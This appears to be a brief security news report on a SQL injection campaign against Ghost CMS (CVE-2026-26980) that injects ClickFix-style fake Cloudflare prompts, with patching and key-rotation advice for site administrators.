What's Happening?
A critical SQL injection vulnerability in Ghost CMS, identified as CVE-2026-26980, is being exploited in a large-scale campaign. The attack involves injecting malicious JavaScript code that triggers ClickFix attack flows. Discovered by XLab threat intelligence
researchers at Qianxin, the campaign has impacted over 700 domains, including university portals, AI/SaaS companies, media outlets, fintech firms, security sites, and personal blogs. The vulnerability affects Ghost versions 3.24.0 through 6.19.0, allowing unauthenticated attackers to access website databases and admin API keys. Despite a fix released in February 2026, many sites have not updated, leaving them vulnerable. Attackers use stolen admin API keys to inject malicious JavaScript into articles, which then fetches second-stage code from the attacker’s infrastructure. This code serves a fake Cloudflare prompt to visitors, leading to further exploitation.
Why It's Important?
The exploitation of this vulnerability poses significant risks to affected websites, potentially compromising sensitive data and user privacy. The widespread impact across various sectors, including education and finance, highlights the importance of timely security updates and patch management. Organizations using Ghost CMS must prioritize upgrading to the latest version to mitigate risks. The campaign underscores the need for robust cybersecurity measures and vigilance against emerging threats. Failure to address such vulnerabilities can lead to data breaches, financial losses, and reputational damage for affected entities.
What's Next?
Website administrators are urged to upgrade to Ghost CMS version 6.19.1 or later and rotate all previously used keys to prevent further exploitation. XLab has provided indicators of compromise to assist in identifying and removing injected scripts. Maintaining a 30-day record of admin API call logs is recommended for retrospective investigation. Continued monitoring and collaboration with cybersecurity experts will be crucial in preventing future attacks and ensuring the security of web platforms.
